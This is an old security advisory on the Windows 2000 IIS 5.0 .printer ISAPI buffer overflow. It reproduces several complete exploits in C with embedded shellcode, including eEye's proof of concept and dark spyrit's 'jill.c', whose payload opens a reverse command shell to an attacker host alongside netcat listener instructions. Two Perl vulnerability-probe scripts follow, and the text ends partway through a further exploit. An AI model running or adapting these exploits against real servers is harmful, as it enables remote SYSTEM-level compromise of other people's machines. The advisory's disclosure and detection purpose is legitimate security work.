COMMAND
IIS
SYSTEMS AFFECTED
Windows 2000 IIS 5.0 (with and without SP1)
PROBLEM
Marc Maiffret from eEye Security found following. A wise man once
said, "When a single exploit is released, it's a good hack. When
you are the first to hack each successive version of a product run
on millions of computers all over the internet, you create a
dynasty."
It seems sometimes the greatest discoveries are the ones that are
the hardest to share with the world. Its not about a lack of
wanting to tell everyone but a lack of not knowing exactly how to
put it so that peoples jaws do not drop so fast that their head
snaps back as they realize just how fragile our world is becoming
as we slowly push society into the digital world people only
dreamed about years ago. A world in which everything is being
connected and little is being done to shore up the large looming
gaps that are in existance in todays networked systems.
This bug was first discovered while Riley Hassel, of eEye Digital
Security, was updating Retina's CHAM (Common Hacking Attack
Methods) techonology to look for unknown vulnerabilities within
some of the new features that Windows 2000 IIS 5.0 provides. One
of the features that was added to be audited by CHAM was the
.printer ISAPI filter extension. Once the .printer ISAPI filter
was added to the list of ISAPI's to audit, as well as various
aspects of the new Web DAV functionality within IIS, the latest
Retina development code was let loose against a test server in our
lab. Within a matter of minutes a debugger kicked in on
inetinfo.exe because of a "buffer overflow error."
It turns out the latest development code of Retina was able to
find a buffer overflow within the .printer ISAPI filter
(C:\WINNT\System32\msw3prt.dll) which provides Windows 2000 with
support for the Internet Printing Protocol (IPP) which allows for
the web based control of various aspects of networked printers.
The vulnerability arises when a buffer of aprox. 420 bytes is sent
within the HTTP Host: header for a .printer ISAPI request.
Example:
GET /NULL.printer HTTP/1.0
Host: [buffer]
Where [buffer] is aprox. 420 characters.
At this point an attacker has sucessfully caused a buffer overflow
within IIS and has overwritten EIP. Now normally the web server
would stop responding once you have "buffer overflowed" it.
However, Windows 2000 will automatically restart the web server if
it notices that the web server has crashed. While the feature is
nice to help create a longer period of "up time" it is actually a
feature that makes it easier for remote attacks to execute code
against Windows 2000 IIS 5.0 web servers.
As we stated earlier our overflow is able to overwrite the EIP
register with whatever we want. That basically means we can
overwrite EIP with a location in memory that jumps to our
"exploit" code, in memory, and then executes our code with SYSTEM
level access.
Ryan Permeh, resident shellcode ninja, of eEye Digital Security
has created an example exploit to be used as a "proof of concept."
Their proof of concept exploit will, when run against an IIS 5 web
server, create a text document on the remote server with
instructions directing readers to a webpage on eeye.com that has
information on how to patch the system so that the web server is
no longer vulnerable to this flaw. This exploit is to only be
considered a proof of concept exploit and any one with Windows
2000 should install the Microsoft supplied patch ASAP.
There is no log because this vulnerability, like most IIS buffer
overflows, does not go logged. That means some of the largest
web servers on the Internet running Windows 2000 are vulnerable
to this attack and when exploited, there will be no IIS log
anywhere that records the attack.
eEye exploit:
/***********************************************************************
iishack 2000 - eEye Digital Security - 2001
This affects all unpatched windows 2000 machines with the .printer
isapi filter loaded. This is purely proof of concept.
Quick rundown of the exploit:
Eip overruns at position 260
i have 19 bytes of code to jump back to the beginning of the buffer.
(and a 4 byte eip jumping into a jmp esp located in mfc42.dll). The
jumpback was kinda weird, requiring a little forward padding to protect
the rest of the code.
The buffer itself:
Uou only have about 250ish bytes before the overflow(taking into
account the eip and jumpback), and like 211 after it. this makes
things tight. This is why i hardcoded the offsets and had 2 shellcodes,
one for each revision. normally, this would suck, but since iis is kind
to us, it cleanly restarts itself if we blow it, giving us another chance.
This should compile clean on windows, linux and *bsd. Other than that, you
are on your own, but the vector is a simple tcp vector, so no biggie.
The vector:
the overflow happens in the isapi handling the .printer extension. The actual
overflow is in the Host: header. This buffer is a bit weird, soi be carfull
what you pass into it. It has a minimal amount of parsing happening before
we get it, making some chars not able to be used(or forcing you to encode
your payload). As far as i can tell, the bad bytes i've come across are:
0x00(duh)
0x0a(this inits a return, basically flaking our buffer)
0x0d(same as above)
0x3a(colon: - this seems to be a separator of some kind, didn't have time or
energy to reverse it any further, it breaks stuff, keep it out of
your buffer)
i have a feeling that there are more bad chars, but in the shellcode i've written
(both this proof of concept and actual port binding shellcode), i've come across
problems, but haven't specifically tagged a "bad" char.
One more thing... inititally, i got this shellcode to fit on the left side of
the buffer overflow. something strange was causing it to fail if i had a length
of under about 315 chars. This seems strange to me, but it could be soemthing i
just screwed up writing this code. This explains the 0x03s padding the end of the
shellcode.
Ryan Permeh
ryan@eeye.com
greetz: riley, for finding the hole
marc, for being a cool boss
dale,nicula,firas, for being pimps
greg hoglund, for sparking some really interesting ideas on exploitable buffers
dark spyrit, for beginning the iis hack tradition
I would also like to thank the academy and to all of those who voted....
Barry, Levonne, and their $240.00 worth of pudding.
http://www.eeye.com/html/research/Advisories/tequila.jpg
*************************************************************************/
#ifdef _WIN32
#include <Winsock2.h>
#include <Windows.h>
#define snprintf _snprintf
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#include <stdio.h>
void usage();
unsigned char GetXORValue(char *szBuff, unsigned long filesize);
unsigned char sc[2][315]={ "\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b\xfc\xfc\xfc\xfc\xcb\xa5\xeb\x74\x8e\x28\xea\x74\xb8\xb3\xeb\x74\x27\x49\xea\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00",
"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b\xfc\xfc\xfc\xfc\x50\x33\xeb\x74\xf7\x86\xeb\x74\x2e\xf0\xeb\x74\x4c\x30\xeb\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00"};
main (int argc, char *argv[])
{
char request_message[500];
int X,sock,sp=0;
unsigned short serverport=htons(80);
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr attack;
#ifdef _WIN32
WORD werd;
WSADATA wsd;
werd= MAKEWORD(2,0);
WSAStartup(werd,&wsd);
#endif
printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n");
printf("Vulnerability found by Riley Hassell <riley@eeye.com>\n");
printf("Exploit by Ryan Permeh <ryan@eeye.com>\n");
if(argc < 4) usage();
if(argv[1] != NULL)
{
nametocheck = gethostbyname (argv[1]);
memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
}
else usage();
if(argv[2] != NULL)
{
serverport=ntohs((unsigned short)atoi(argv[2]));
}
if(argv[3] != NULL)
{
sp=atoi(argv[3]);
}
printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
memset(request_message,0x00,500);
snprintf(request_message,500,"GET /null.printer HTTP/1.1\r\nHost: %s\r\n\r\n",sc[sp]);
sock = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr = attack.s_addr;
serv_addr.sin_port = serverport;
X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
if(X==0)
{
send(sock,request_message,strlen(request_message)*sizeof(char),0);
printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
}
else
{
printf("Couldn't connect\n",inet_ntoa(attack));
}
#ifdef _WIN32
closesocket(sock);
#else
close(sock);
#endif
return 0;
}
void usage()
{
printf("Syntax: iishack2000 <hostname> <server port> <service pack>\n");
printf("Example: iishack2000 127.0.0.1 80 0\n");
printf("Example: iishack2000 127.0.0.1 80 1\n");
exit(1);
}
In some environments, security staff may be responsible for
identifying which IIS 5.0 servers, out of a large collection of
them, still do not have a fix in place for this vulnerability.
The security staff may not have any convenient way to check for
the existence of c:\www.eEye.com.txt on every server, and thus a
proof-of-concept exploit that provides a result observable over
the network may be of interest. One possibility, which involves
only minor changes to the code provided by eEye Digital Security,
is to try to get the IIS 5.0 system to access a UNC share on a
system controlled by the security staff. Below is a patch to
iishack2000.c that implements this.
Example: the security staff operate a machine 10.0.0.1 that has
some way of logging any packets sent to it on tcp ports 139 and
445 (ipchains, IP Filter, etc.), and which normally sees no
traffic on those ports. The machine 10.0.0.2 is one of a large
number of IIS 5.0 servers that might still have the MS01-023
vulnerability. The setup of 10.0.0.2 allows it to send SMB
requests to 10.0.0.1, even though it normally would not do so.
The security staff run this program, e.g.,
% iishack2000 10.0.0.2 80 0 10.0.0.1
% iishack2000 10.0.0.2 80 1 10.0.0.1
and then look at the packet log files. If there are packets from
10.0.0.2 to 10.0.0.1 on tcp ports 139 or 445, then 10.0.0.2 is
almost certainly vulnerable. Otherwise, no evidence of a
vulnerability has been found. Presumably more efficient methods
will become available later, but this one may be of interest
since many organizations need to check their IIS 5.0 servers now.
*** iishack2000.c.old Wed May 2 23:58:17 2001
--- iishack2000.c Wed May 2 23:58:17 2001
***************
*** 86,89 ****
{
! char request_message[500];
! int X,sock,sp=0;
unsigned short serverport=htons(80);
--- 86,89 ----
{
! char ip[16],request_message[500],unc[20];
! int X,i,len,sock,sp=0;
unsigned short serverport=htons(80);
***************
*** 101,103 ****
printf("Exploit by Ryan Permeh <ryan@eeye.com>\n");
! if(argc < 4) usage();
if(argv[1] != NULL)
--- 101,103 ----
printf("Exploit by Ryan Permeh <ryan@eeye.com>\n");
! if(argc < 5) usage();
if(argv[1] != NULL)
***************
*** 116,118 ****
}
! printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
memset(request_message,0x00,500);
--- 116,142 ----
}
! if(argv[4] != NULL && strlen(argv[4]) <= 15)
! {
! strcpy(ip, argv[4]);
! strcpy(&unc[2], argv[4]);
! len = strlen(argv[4]);
! }
! else
! {
! strcpy(ip, "127.0.0.1");
! strcpy(&unc[2], "127.0.0.1");
! len = strlen("127.0.0.1");
! }
! unc[0] = '\\';
! unc[1] = '\\';
! unc[len + 2] = '\\';
! for (i = 0; i < 16 - len; ++i)
! {
! unc[len + 3 + i] = 'A';
! }
! unc[19] = '\0';
! for (i = 146; i <= 164; ++i)
! {
! sc[sp][i] = unc[i - 146] ^ 3;
! }
! printf("Sending string to overflow sp %d for host: %s on port:%d and contact %s\n",sp,inet_ntoa(attack),htons(serverport),ip);
memset(request_message,0x00,500);
***************
*** 128,131 ****
send(sock,request_message,strlen(request_message)*sizeof(char),0);
! printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
! printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
}
--- 152,155 ----
send(sock,request_message,strlen(request_message)*sizeof(char),0);
! printf("Sent overflow, now look at logs on %s for SMB packets from %s\n",ip,inet_ntoa(attack));
! printf("If no packets were logged, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
}
***************
*** 144,148 ****
{
! printf("Syntax: iishack2000 <hostname> <server port> <service pack>\n");
! printf("Example: iishack2000 127.0.0.1 80 0\n");
! printf("Example: iishack2000 127.0.0.1 80 1\n");
exit(1);
--- 168,172 ----
{
! printf("Syntax: iishack2000 <hostname> <server port> <service pack> <log host>\n");
! printf("Example: iishack2000 127.0.0.1 80 0 10.0.0.1\n");
! printf("Example: iishack2000 127.0.0.1 80 1 10.0.0.1\n");
exit(1);
dark spyrit did another exploit:
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
*
* by: dark spyrit <dspyrit@beavuh.org>
*
* respect to eeye for finding this one - nice work.
* shouts to halvar, neofight and the beavuh bitchez.
*
* this exploit overwrites an exception frame to control eip and get to
* our code.. the code then locates the pointer to our larger buffer and
* execs.
*
* usage: jill <victim host> <victim port> <attacker host> <attacker port>
*
* the shellcode spawns a reverse cmd shell.. so you need to set up a
* netcat listener on the host you control.
*
* Ex: nc -l -p <attacker port> -vv
*
* I haven't slept in years.
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
int main(int argc, char *argv[]){
/* the whole request rolled into one, pretty huh? carez. */
unsigned char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;
printf("iis5 remote .printer overflow.\n"
"dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");
if (argc != 5){
printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
exit(1);
}
if ((ht = gethostbyname(argv[1])) == 0){
herror(argv[1]);
exit(1);
}
sin.sin_port = htons(atoi(argv[2]));
a_port = htons(atoi(argv[4]));
a_port^=0x9595;
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);
if ((ht = gethostbyname(argv[3])) == 0){
herror(argv[3]);
exit(1);
}
a_host = *((unsigned long *)ht->h_addr);
a_host^=0x95959595;
sploit[441]= (a_port) & 0xff;
sploit[442]= (a_port >> 8) & 0xff;
sploit[446]= (a_host) & 0xff;
sploit[447]= (a_host >> 8) & 0xff;
sploit[448]= (a_host >> 16) & 0xff;
sploit[449]= (a_host >> 24) & 0xff;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
printf("\nconnecting... \n");
if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
perror("connect");
exit(1);
}
write(s, sploit, strlen(sploit));
sleep (1);
close (s);
printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
exit(0);
}
Wanderley J. Abreu Jr coded a very simple vulnerability test, that
actually causes the memory leak but still don't have the shellcode
to overwrite the EIP register.
#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with sucess against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol
# This code was written after eEye brought this issue in BugTraq.
use Socket;
print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";
if (not $ARGV[0]) {
print qq~
Usage: webexplt.pl <host>
~;
exit;}
$ip=$ARGV[0];
print "Sending Exploit Code to host: " . $ip . "\n\n";
my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: =
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
print "Results:\n";
if (not @results) {
print "The Machine tested has the IPP Vulnerability!";
}
print @results;
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S);
$|=1;
print $pstr;
my @in=<S>;
select(STDOUT);
close(S);
return @in;
} else { die("Can't connect...\n"); }
}
After patching servers, webexplt.pl will still report servers
vulnerable. That's because webexplt.pl uses too long of a string.
It reports that the server is vulnerable if it doesn't return a
response. Microsoft's patch causes the server to not return
a response for any Host: value greater than 256 bytes in length.
The behavior of webexplt.pl is the same for servers that are
patched and unpatched. To get around this send 257 bytes and
interpret the results as follows:
- If no response is returned the system has been patched.
- If a 500 error is returned the server is unpatched.
- If a 404 error is returned the .printer mapping has been
removed.
Below is a script based on webexplt.pl that works correctly.
#!/usr/bin/perl
# By paul@moquijo.com
# Based on code by storm@stormdev.net
# Tested with sucess against Win2k IIS 5.0 (+ SP1)
# Remote Buffer Overflow Test for Internet Printing Protocol
# This code was written after eEye brought this issue in BugTraq.
use Socket;
print "-- IPP - IIS 5.0 Vulnerability Test --\n\n";
if (not $ARGV[0]) {
print "\tUsage: $0 <host>\n\n";
exit;
}
$ip=$ARGV[0];
print "Sending test probe to host: " . $ip . "\n\n";
my $result=join('',sendexplt("GET /NULL.printer HTTP/1.1\n" . "Host: " . "A" x 257 . "\n\n"));
if (not $result) {
print "The server tested has been patched for the IPP vulnerability\n\n";
exit;
}
if ($result =~ ?HTTP/1.1 500?) {
print "The server tested has the IPP vulnerability!\n\n";
exit;
}
if ($result =~ ?HTTP/1.1 404?) {
print "The server has had the .printer mapping removed.\n\n";
exit;
}
print "An unexpected response has been received:\n";
print $result;
exit;
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S);
$|=1;
print $pstr;
my @in=<S>;
select(STDOUT);
close(S);
return @in;
} else {
die("Can't connect...\n");
}
}
On many servers, the .printer mapping will automatically be
reinstated when the IIS 5 server is rebooted. There is a local
policy called "Web Based Printing" that can cause the .printer
mapping to be automatically recreated even if manually removed.
Another code:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
// #include <winsock2.h>
int main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short int netcatport;
unsigned long netcathost;
struct sockaddr_in sin;
int sock;
struct hostent *nchostname;
WSAStartup((MAKEWORD(2, 2)), &wsaData);
unsigned char exploit[] =
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
